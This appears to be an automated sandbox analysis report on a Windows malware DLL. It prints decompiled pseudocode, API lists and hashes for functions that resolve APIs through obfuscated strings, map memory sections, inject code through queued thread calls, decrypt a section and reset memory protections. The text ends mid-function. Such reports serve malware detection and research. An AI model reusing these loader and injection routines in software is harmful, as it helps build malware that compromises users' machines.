                                                                                                                          • Opcode ID: bf3048a1cb85ade1c81645764f789790540ba14ca683a111abc798c8eb0f530c
                                                                                                                          • Instruction ID: f530236d31925416ebb53034c3930c872c853181821fff25fd68617e3fc35b21
                                                                                                                          • Opcode Fuzzy Hash: bf3048a1cb85ade1c81645764f789790540ba14ca683a111abc798c8eb0f530c
                                                                                                                          • Instruction Fuzzy Hash: FA313A75E0020BDFDB44CF99C894AADB7FAFF45311B104069DA11EB640E770DA89CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D1273, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E6E2D1273(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                                                          0x6e2d1285
                                                                                                                          0x6e2d128b
                                                                                                                          0x6e2d1299
                                                                                                                          0x6e2d12a0
                                                                                                                          0x6e2d12a5
                                                                                                                          0x6e2d12ab
                                                                                                                          0x00000000
                                                                                                                          0x6e2d12ac
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,6E2D142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E2D142A,?), ref: 6E2D12A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: SectionView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1323581903-0
                                                                                                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                          • Instruction ID: 0f658fd4661e9293b57205bfc823aa0561a172ea8e4aa63b401bc34931fc18fe
                                                                                                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                          • Instruction Fuzzy Hash: 5DF012B590420CBFEB119FA5CC89C9FBBBDEB44354B104939F252E1490D6319E4C8A60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D19C2, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D19C2(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E2D1000(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e2d41c4 + 0x6e2d5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e2d41c4 + 0x6e2d5151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E2D1397(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e2d41c4 + 0x6e2d5161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e2d41c4 + 0x6e2d5174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e2d41c4 + 0x6e2d5189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e2d41c4 + 0x6e2d519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E2D13B8(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                          0x6e2d19d0
                                                                                                                          0x6e2d19d4
                                                                                                                          0x6e2d1a95
                                                                                                                          0x6e2d19da
                                                                                                                          0x6e2d19f2
                                                                                                                          0x6e2d1a01
                                                                                                                          0x6e2d1a08
                                                                                                                          0x6e2d1a0a
                                                                                                                          0x6e2d1a0f
                                                                                                                          0x6e2d1a8d
                                                                                                                          0x6e2d1a8e
                                                                                                                          0x6e2d1a11
                                                                                                                          0x6e2d1a1e
                                                                                                                          0x6e2d1a20
                                                                                                                          0x6e2d1a25
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1a27
                                                                                                                          0x6e2d1a34
                                                                                                                          0x6e2d1a36
                                                                                                                          0x6e2d1a3b
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1a3d
                                                                                                                          0x6e2d1a4a
                                                                                                                          0x6e2d1a4c
                                                                                                                          0x6e2d1a51
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1a53
                                                                                                                          0x6e2d1a60
                                                                                                                          0x6e2d1a62
                                                                                                                          0x6e2d1a67
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1a69
                                                                                                                          0x6e2d1a6f
                                                                                                                          0x6e2d1a75
                                                                                                                          0x6e2d1a7a
                                                                                                                          0x6e2d1a7f
                                                                                                                          0x6e2d1a84
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1a86
                                                                                                                          0x6e2d1a89
                                                                                                                          0x6e2d1a89
                                                                                                                          0x6e2d1a84
                                                                                                                          0x6e2d1a67
                                                                                                                          0x6e2d1a51
                                                                                                                          0x6e2d1a3b
                                                                                                                          0x6e2d1a25
                                                                                                                          0x6e2d1a0f
                                                                                                                          0x6e2d1aa3

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2D1000: HeapAlloc.KERNEL32(00000000,?,6E2D15ED,00000030,73B763F0,00000000), ref: 6E2D100C
                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E2D1051,?,?,?,?), ref: 6E2D19E6
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A08
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A1E
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A34
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A4A
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A60
                                                                                                                            • Part of subcall function 6E2D13B8: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 6E2D1415
                                                                                                                            • Part of subcall function 6E2D13B8: memset.NTDLL ref: 6E2D1437
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1632424568-0
                                                                                                                          • Opcode ID: e1a2ea817456e7067d0f309717bb3c5794b5e0780f07876b55f537461df60087
                                                                                                                          • Instruction ID: 1de46e531780b569552778de198a15de4b2cb85c3f30f9c10d332d8b11633200
                                                                                                                          • Opcode Fuzzy Hash: e1a2ea817456e7067d0f309717bb3c5794b5e0780f07876b55f537461df60087
                                                                                                                          • Instruction Fuzzy Hash: BE218DB0600A0FEFDB00DFA9CC44D9AB7EEEF452007004665EA64E7640E770EA48CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D1B59, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e2d4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e2d418c;
						if( *0x6e2d418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e2d4198;
								if( *0x6e2d4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e2d418c);
						}
						HeapDestroy( *0x6e2d4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e2d4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6e2d4190 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e2d41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E2D153C(E6E2D1719, E6E2D1C35(_a12, 1, 0x6e2d4198, _t41));
							 *0x6e2d418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                          0x6e2d1b5c
                                                                                                                          0x6e2d1b68
                                                                                                                          0x6e2d1b6a
                                                                                                                          0x6e2d1b6d
                                                                                                                          0x6e2d1be3
                                                                                                                          0x6e2d1be9
                                                                                                                          0x6e2d1beb
                                                                                                                          0x6e2d1bed
                                                                                                                          0x6e2d1bf3
                                                                                                                          0x6e2d1bf5
                                                                                                                          0x6e2d1bfa
                                                                                                                          0x6e2d1bfd
                                                                                                                          0x6e2d1c08
                                                                                                                          0x6e2d1c0a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1c0c
                                                                                                                          0x6e2d1c0f
                                                                                                                          0x6e2d1c11
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1c11
                                                                                                                          0x6e2d1c19
                                                                                                                          0x6e2d1c19
                                                                                                                          0x6e2d1c25
                                                                                                                          0x6e2d1c25
                                                                                                                          0x6e2d1b6f
                                                                                                                          0x6e2d1b70
                                                                                                                          0x6e2d1b90
                                                                                                                          0x6e2d1b96
                                                                                                                          0x6e2d1b9b
                                                                                                                          0x6e2d1b9d
                                                                                                                          0x6e2d1bd9
                                                                                                                          0x6e2d1bd9
                                                                                                                          0x6e2d1b9f
                                                                                                                          0x6e2d1ba7
                                                                                                                          0x6e2d1bae
                                                                                                                          0x6e2d1bb8
                                                                                                                          0x6e2d1bc4
                                                                                                                          0x6e2d1bc9
                                                                                                                          0x6e2d1bd0
                                                                                                                          0x6e2d1bd5
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1bd5
                                                                                                                          0x6e2d1bd0
                                                                                                                          0x6e2d1b9d
                                                                                                                          0x6e2d1b70
                                                                                                                          0x6e2d1c32

                                                                                                                          APIs
                                                                                                                          • InterlockedIncrement.KERNEL32(6E2D4188), ref: 6E2D1B7B
                                                                                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E2D1B90
                                                                                                                            • Part of subcall function 6E2D153C: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E2D4198,6E2D1BC9), ref: 6E2D1553
                                                                                                                            • Part of subcall function 6E2D153C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E2D1568
                                                                                                                            • Part of subcall function 6E2D153C: GetLastError.KERNEL32(00000000), ref: 6E2D1573
                                                                                                                            • Part of subcall function 6E2D153C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E2D157D
                                                                                                                            • Part of subcall function 6E2D153C: CloseHandle.KERNEL32(00000000), ref: 6E2D1584
                                                                                                                            • Part of subcall function 6E2D153C: SetLastError.KERNEL32(00000000), ref: 6E2D158D
                                                                                                                          • InterlockedDecrement.KERNEL32(6E2D4188), ref: 6E2D1BE3
                                                                                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 6E2D1BFD
                                                                                                                          • CloseHandle.KERNEL32 ref: 6E2D1C19
                                                                                                                          • HeapDestroy.KERNEL32 ref: 6E2D1C25
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2110400756-0
                                                                                                                          • Opcode ID: 6e0f9a9dec22ce244f819cd7b61f08f7e8b1bbc53cce458049474725a31ae946
                                                                                                                          • Instruction ID: 5e2b39d50ecd53e7d2c67e2209d4f774af2520c6c4869190a5f3178e3bf99311
                                                                                                                          • Opcode Fuzzy Hash: 6e0f9a9dec22ce244f819cd7b61f08f7e8b1bbc53cce458049474725a31ae946
                                                                                                                          • Instruction Fuzzy Hash: 90218E35A04A1EAFCB00AFE9CC8CA497BBBF7567627144825E756D3540E630C98DCB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D153C, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D153C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e2d41c0, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                                                                                          0x6e2d1553
                                                                                                                          0x6e2d1559
                                                                                                                          0x6e2d155d
                                                                                                                          0x6e2d1568
                                                                                                                          0x6e2d1570
                                                                                                                          0x6e2d1579
                                                                                                                          0x6e2d157d
                                                                                                                          0x6e2d1584
                                                                                                                          0x6e2d158b
                                                                                                                          0x6e2d158d
                                                                                                                          0x6e2d1593
                                                                                                                          0x6e2d1570
                                                                                                                          0x6e2d1597

                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E2D4198,6E2D1BC9), ref: 6E2D1553
                                                                                                                          • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E2D1568
                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 6E2D1573
                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 6E2D157D
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6E2D1584
                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 6E2D158D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3832013932-0
                                                                                                                          • Opcode ID: 155ad02b79f2b814d5e2744008e6e715898260ac5ddb6fa2915089701fa58b99
                                                                                                                          • Instruction ID: 2783f6a8a9bcc7978703361582a7bd369cf6a955e6d3f57a690c969569b25a38
                                                                                                                          • Opcode Fuzzy Hash: 155ad02b79f2b814d5e2744008e6e715898260ac5ddb6fa2915089701fa58b99
                                                                                                                          • Instruction Fuzzy Hash: 45F08C32A04A29BBDB121BA0DC0CFABBFABFB0A753F004514F70990040C7A58804CBB1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2EC1E0, Relevance: 8.5, APIs: 1, Strings: 3, Instructions: 1462COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,6E37C338,000008BB), ref: 6E2ED345
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleName
                                                                                                                          • String ID: j6n$1$N
                                                                                                                          • API String ID: 514040917-767998455
                                                                                                                          • Opcode ID: 1c52a8fb4239f4e1b2e0cf06c705dc13faf70095c59f3ed9a9a65279422aebf7
                                                                                                                          • Instruction ID: 49d7f1dcaba074517f02aef7b9a37e0758418872f8ca569b34a950447486d15f
                                                                                                                          • Opcode Fuzzy Hash: 1c52a8fb4239f4e1b2e0cf06c705dc13faf70095c59f3ed9a9a65279422aebf7
                                                                                                                          • Instruction Fuzzy Hash: 80F272B15049B88FCF08CF69C590A797BBAF797301B3488EAD54596785E338D588EB0C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D189E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E6E2D189E(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x6e2d41b0;
				_t46 = E6E2D2016(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x6e2d41c0;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x6e2d51a7; // 0x6e2d51a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E6E2D1AA6(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x6e2d41c0 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}






















                                                                                                                          0x6e2d18a5
                                                                                                                          0x6e2d18b5
                                                                                                                          0x6e2d18ba
                                                                                                                          0x6e2d18bf
                                                                                                                          0x6e2d18d4
                                                                                                                          0x6e2d18db
                                                                                                                          0x6e2d18e0
                                                                                                                          0x6e2d18f1
                                                                                                                          0x6e2d18f4
                                                                                                                          0x6e2d18fa
                                                                                                                          0x6e2d18ff
                                                                                                                          0x6e2d19b2
                                                                                                                          0x6e2d1905
                                                                                                                          0x6e2d1905
                                                                                                                          0x6e2d190b
                                                                                                                          0x6e2d197a
                                                                                                                          0x6e2d190d
                                                                                                                          0x6e2d190d
                                                                                                                          0x6e2d1910
                                                                                                                          0x6e2d1912
                                                                                                                          0x6e2d191a
                                                                                                                          0x6e2d191d
                                                                                                                          0x6e2d1920
                                                                                                                          0x6e2d1928
                                                                                                                          0x6e2d1933
                                                                                                                          0x6e2d1934
                                                                                                                          0x6e2d1935
                                                                                                                          0x6e2d1952
                                                                                                                          0x6e2d1960
                                                                                                                          0x6e2d1967
                                                                                                                          0x6e2d196a
                                                                                                                          0x6e2d196d
                                                                                                                          0x6e2d1975
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1925
                                                                                                                          0x6e2d1925
                                                                                                                          0x6e2d1977
                                                                                                                          0x6e2d1984
                                                                                                                          0x6e2d1999
                                                                                                                          0x6e2d1986
                                                                                                                          0x6e2d198f
                                                                                                                          0x6e2d1994
                                                                                                                          0x6e2d19aa
                                                                                                                          0x6e2d19aa
                                                                                                                          0x6e2d19b9
                                                                                                                          0x6e2d19bf

                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,73B763F0,00003000,00000004,00000030,00000000,73B763F0,00000000,?,?,?,?,?,?,6E2D163B,00000000), ref: 6E2D18F4
                                                                                                                          • memcpy.NTDLL(?,6E2D163B,73B763F0,?,?,?,?,?,?,6E2D163B,00000000,00000030,73B763F0,00000000), ref: 6E2D198F
                                                                                                                          • VirtualFree.KERNELBASE(6E2D163B,00000000,00008000,?,?,?,?,?,?,6E2D163B,00000000), ref: 6E2D19AA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$AllocFreememcpy
                                                                                                                          • String ID: Sep 18 2021
                                                                                                                          • API String ID: 4010158826-1373364653
                                                                                                                          • Opcode ID: e3d641c80375df18ec201e7d6ef9c2a5616645a77078ea0394217212bb47c117
                                                                                                                          • Instruction ID: d4951b35d697fcd3d5f7d9acb667c9cc7ba073d10d1f17730f77a91e365dc2a5
                                                                                                                          • Opcode Fuzzy Hash: e3d641c80375df18ec201e7d6ef9c2a5616645a77078ea0394217212bb47c117
                                                                                                                          • Instruction Fuzzy Hash: 1C310C75D1021EAFDB01CFD8C984AEEB7BAFF05304F104169EA15BB241D771AA4ACB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D1719, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E6E2D1719(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E2D15C6(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                                                                                          0x6e2d1722
                                                                                                                          0x6e2d1727
                                                                                                                          0x6e2d1735
                                                                                                                          0x6e2d173a
                                                                                                                          0x6e2d173a
                                                                                                                          0x6e2d1740
                                                                                                                          0x6e2d1745
                                                                                                                          0x6e2d1749
                                                                                                                          0x6e2d174d
                                                                                                                          0x6e2d174d
                                                                                                                          0x6e2d1757
                                                                                                                          0x6e2d1760

                                                                                                                          APIs
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 6E2D171C
                                                                                                                          • SetThreadAffinityMask.KERNEL32 ref: 6E2D1727
                                                                                                                          • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E2D173A
                                                                                                                          • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E2D174D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452675757-0
                                                                                                                          • Opcode ID: f7225877d1107398d428a67fd6155de777ca23200975daab243724da4f4854cb
                                                                                                                          • Instruction ID: cce3bd9ec98994edea5261f9b59bb6e9cebefac4b51b1bce85f317055d2d2ef3
                                                                                                                          • Opcode Fuzzy Hash: f7225877d1107398d428a67fd6155de777ca23200975daab243724da4f4854cb
                                                                                                                          • Instruction Fuzzy Hash: 08E09B317056192BA6112A698C8CD5B775EEF923327110235F720D62D0DB948C09C575
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D12B5, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E6E2D12B5(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e2d41c0;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                                                                                                                          0x6e2d12bf
                                                                                                                          0x6e2d12cc
                                                                                                                          0x6e2d12d2
                                                                                                                          0x6e2d12de
                                                                                                                          0x6e2d12ee
                                                                                                                          0x6e2d12f0
                                                                                                                          0x6e2d12f8
                                                                                                                          0x6e2d138d
                                                                                                                          0x6e2d1394
                                                                                                                          0x00000000
